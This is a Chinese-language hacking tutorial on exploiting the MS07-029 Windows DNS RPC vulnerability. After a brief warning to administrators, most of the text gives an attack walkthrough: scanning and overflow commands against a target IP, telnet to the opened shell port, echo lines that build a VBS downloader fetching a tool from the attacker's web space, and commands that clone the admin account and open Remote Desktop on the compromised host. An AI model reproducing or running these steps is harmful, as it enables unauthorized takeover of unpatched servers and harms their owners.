有時候系統漏洞對于企業服務器來說是致命的，黑客入侵時可以通過漏洞來獲得管理員權限從而將服務器玩弄于股掌之中。MS07-029漏洞是一個服務器遠程訪問漏洞，如果程序員沒有打上MS07-029漏洞補丁那么講受到致命的危害。所以在此提醒廣大的企業管理員，積極掃描自己的服務器，發現漏洞之后一定要及時采取行動，使得類似于MS07-029漏洞攻擊的情況避免出現。

我們先來看看所用工具的界面：

這就是傳說中的利用工具，可以通殺2000SEVER，2003SEVER系統，另外還具備了掃描功能!

先用它來對主機進行掃描：

在我們的命令行下輸入：“dns –s 目標IP地址”
　
稍等片刻，開放的端口以及操作系統以出現在我們面前，如果出現了“1029:Vulnerability”那么恭喜你，你馬上就會成功得到這臺主機的權限了

現在我們來最關鍵的步驟――溢出：

在命令行內輸入

dns -2003chs *.*.93.189 1029

其中-2003ch的意思是操作系統的型號，-2003chs即簡體中文版的2003系統，

如果是2000的系統就使用“-2000all”參數，*.*.93.189就是我們的目標IP地址，1029就是剛才掃描出存在漏洞的端口”。

出現“Attack sent ,check port 1100”字樣，說明已經打開了目標地址的1100端口，我們TELNET上去：TELNET *.*.93.189 1100

我們現在已經成功的通過MS07-029漏洞入侵了對方的電腦，并且得到了管理員的權限。

下面我給大家介紹一下如何在肉雞上面開3389

在命令行里輸入

@echo with wscript:if .arguments.count^ tony.vbs

@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs

@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs

@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs

大概的意思就是在命令行創立一個用來下載的VBS腳本tony.vbs

然后把開3389的工具上傳到你的個人空間,

我這里用的是火狐開3389的工具，在命令行里輸入 cscript tony.vbs http://你空間地址/wrsky.exe c:\wrsky.exe

wrsky.exe -c”可以克隆當前管理員帳號

再輸入“c:\wrsky.exe -o 3551”

意思就是打開對方的遠程桌面服務，并且使用3551端口。

用“wrsky.exe -k”可以檢查3389是否開啟，開啟以后輸入“wrsky.exe -r”,對方的電腦就自動重啟以后就可以連接上去了。

在運行里輸入"mstsc",登陸上去。

那熟悉而又親切的畫面出現在我們面前了。

如果是2K的系統，還有一個更加傻瓜化的工具open3389，直接運行就可以了，不需要任何參數，不過對方電腦會馬上重啟。

另外我還放了其他兩個DNS利用工具和一篇ZWELL的精華文章在光盤里，有興趣的朋友可以自己研究。

這個漏洞的危害是是分巨大的，目前利用DNS服務RPC漏洞傳播的蠕蟲病毒VanBot已經出現，變種已經開始瘋狂傳播。
 

【編輯推薦】

1. 淺談后門的概念與分類
2. 經典后門實例之網頁后門
3. 經典后門實例之線程插入后門
4. 經典后門實例之擴展后門
5. 用Mysql語句來生成后門木馬方案